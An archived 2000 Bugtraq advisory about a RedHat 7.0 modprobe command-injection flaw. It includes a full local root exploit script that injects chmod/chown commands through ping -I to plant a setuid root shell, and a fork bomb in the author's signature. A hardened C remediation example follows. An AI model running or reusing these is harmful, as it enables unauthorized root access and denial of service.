[17619] in bugtraq

home help back first fref pref prev next nref lref last post

RedHat 7.0 (and SuSE): modutils + netkit = root compromise. (fwd)

daemon@ATHENA.MIT.EDU (Michal Zalewski)
Mon Nov 13 01:06:35 2000

Message-ID:  <Pine.LNX.4.21.0011122236400.23718-200000@nimue.tpi.pl>
Date:         Sun, 12 Nov 2000 22:46:53 +0100
Reply-To: Michal Zalewski <lcamtuf@TPI.PL>
From: Michal Zalewski <lcamtuf@TPI.PL>
To: BUGTRAQ@SECURITYFOCUS.COM

Motto from the modprobe manpage: "BUGS: Naah..."
------------------------------------------------

This vulnerability has been found by Sebastian Krahmer some time ago (he
is posting an advisory right now). Stupid shell command execution within a
userspace kernel helper application, modprobe, is something you do not
want to see. But it happened. I have no idea how it could be introduced in
RH 7.0 systems and some other distros (like recent SuSE), but it was. Ugh.

Well, Sebastian believed this vulnerability is really difficult to exploit
(at least in standard configurations). I had the same feeling about it.
But, after being asked by Sebastian to do it, I've found some time and
decided to investigate it more carefully. First of all, I've tried to find
any way to exploit it in an RH 6.2 environment with "upgraded" modprobe. No
success. Then, I've switched to a brand new, shiny RH 7.0 installation. And
voila - nothing easier. The attached exploit is somewhat hackish - abusing
the new ping utility in this system to exploit the modprobe vulnerability.
As slashes in the device name are rejected by modprobe and the environment
is not preserved, this exploit works in a really weird way, operating on
modprobe's pwd (/), making it world-writable for a second.

NOTE: if this exploit fails, it does not necessarily mean your modprobe is
secure; it might mean your system is equipped with, for example, the old
/bin/ping utility instead of the new iputils software. You should be aware
that RedHat released some iputils updates, which apparently "accidentally"
fix this particular way of exploiting it. But this utility is only an
instrument used to exploit the bug. You can play with other setuid
programs, /bin/ping6, privileged services etc. Be creative.

Well, two applications were upgraded and shipped in a manner which opens
a really huge root compromise possibility. Well done, RedHat :)

Greetings to Sebastian, of course, to Solar Designer, kil3r, Nises, Scott,
Dave, Simple Nomad, Aleph One, #hax and all the people :)

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

Attachment: exploit (shell script; decoded here from the base64 part of the
original message, with comments added and the C helper given the headers and
prototypes it needs to build on a current compiler)

#!/bin/sh
# RedHat 7.0 modutils exploit: shell command injection in modprobe, reached
# through the setuid iputils ping's -I <interface> argument. The interface
# name goes to the kernel, which hands it to modprobe as a module name.

echo
echo "RedHat 7.0 modutils exploit"
echo "(c) 2000 Michal Zalewski <lcamtuf@ids.pl>"
echo "Bug discovery: Sebastian Krahmer <krahmer@cs.uni-potsdam.de>"
echo
echo "Does not have to work on older / non-RH systems. This bug has been"
echo "introduced recently. Enjoy :)"
echo
echo "This exploit is really hackish, because slashes are not allowed in"
echo "modprobe parameters, thus we have to play in modprobe's cwd (/)."
echo

# Prefer a setuid ping6, fall back to ping; both accept -I <name>.
PING=/bin/ping6
test -u $PING || PING=/bin/ping

if [ ! -u $PING ]; then
  echo "Sorry, no setuid ping."
  exit 0
fi

echo "Phase 1: making / world-writable..."

# modprobe runs as root with cwd /, so "." is /. The target address only
# has to be syntactically valid; ping never needs to reach it.
$PING -I ';chmod o+w .' 195.117.3.59 >/dev/null 2>&1

sleep 1

echo "Phase 2: compiling helper application in /..."

# The helper restores / to 0755, removes its own traces and execs a shell.
cat >/x.c <<_eof_
#include <stdlib.h>
#include <unistd.h>

int main(void) {
  setuid(0); seteuid(0);
  system("chmod 755 /; rm -f /x; rm -f /x.c");
  execl("/bin/bash", "bash", "-i", (char *)NULL);
  return 1;
}
_eof_

gcc /x.c -o /x
chmod 755 /x

echo "Phase 3: chown+chmod on our helper application..."

# Again relative to modprobe's cwd: "x" is /x.
$PING -I ';chown 0 x' 195.117.3.59 >/dev/null 2>&1
sleep 1
$PING -I ';chmod +s x' 195.117.3.59 >/dev/null 2>&1
sleep 1

if [ ! -u /x ]; then
  echo "Apparently, this is not exploitable on this system :("
  exit 1
fi

echo "Voila! Entering rootshell..."

/x

echo "Thank you."
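The pattern the exploit above abuses, as an added example that is not part of the original post, not modutils code and not the attached exploit: an untrusted string (here an interface name the kernel passes on as a module name) pasted into a shell command line, next to a hardened replacement that allow-lists the name, builds an argv for execve() so no shell ever parses it, and runs the helper with a fixed cwd and a scrubbed environment. The "modprobe -s -k <name>" command line, the /sbin/modprobe path and the PATH value are assumptions for illustration; the real modutils call site is not reproduced here.

```c
/*
 * Added example (not modutils code, not the attached exploit): the
 * command-injection pattern described in the post beside a hardened
 * replacement. The command line "modprobe -s -k <name>" and the
 * /sbin/modprobe path are assumptions for illustration.
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_MODNAME 64

/* VULNERABLE: the name is pasted into a command line destined for sh -c.
 * A name like ";chmod o+w ." becomes a second shell command, which is what
 * the exploit feeds in through ping -I. */
const char *build_shell_command_vulnerable(const char *name)
{
    static char cmd[256];
    snprintf(cmd, sizeof cmd, "modprobe -s -k %s", name);
    return cmd;   /* the vulnerable caller would do system(cmd) or popen(cmd, "r") */
}

/* HARDENED step 1: allow-list the characters a module alias can contain.
 * Rejects ; ` $ | & < > ( ) quotes, whitespace and '/', and also a leading
 * '-' so the name cannot be parsed as a modprobe option. */
int module_name_is_safe(const char *name)
{
    size_t n = strlen(name);
    if (n == 0 || n > MAX_MODNAME || name[0] == '-')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '_' && c != '-' && c != '.')
            return 0;
    }
    return 1;
}

/* HARDENED step 2: build an argv for execve(), so no shell ever sees the
 * name. Returns NULL when the name fails validation. */
const char **build_modprobe_argv(const char *name)
{
    static const char *argv[5];
    if (!module_name_is_safe(name))
        return NULL;
    argv[0] = "/sbin/modprobe";   /* assumed path */
    argv[1] = "-s";
    argv[2] = "-k";
    argv[3] = name;
    argv[4] = NULL;
    return argv;
}

/* HARDENED step 3: run it with a fixed cwd and a minimal environment so
 * neither is attacker-chosen; with no shell in the chain, a name that
 * refers to "." or "x" is just a module name that will not be found.
 * Returns the child's exit status, or -1 if the name was rejected or fork failed. */
int run_modprobe_safely(const char *name)
{
    const char **argv = build_modprobe_argv(name);
    static char *const envp[] = { "PATH=/sbin:/bin", NULL };   /* assumed */
    if (argv == NULL)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (chdir("/") != 0)
            _exit(127);
        execve(argv[0], (char *const *)argv, envp);
        _exit(127);
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *payload = ";chmod o+w .";   /* the exploit's Phase 1 payload */
    printf("vulnerable: sh -c \"%s\"\n", build_shell_command_vulnerable(payload));
    printf("hardened:   \"%s\" -> %s\n", payload,
           module_name_is_safe(payload) ? "accepted" : "rejected");
    printf("hardened:   \"eth0\" -> %s\n",
           module_name_is_safe("eth0") ? "accepted" : "rejected");
    return 0;
}
```

The allow-list is deliberately stricter than "no slashes": the exploit never needs a slash because modprobe's cwd is already /, so rejecting only '/' (as the post notes modprobe did) leaves ';', backquotes and '$(...)' free to do the work. Removing the shell from the path is the fix; the character check is defence in depth against option injection.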
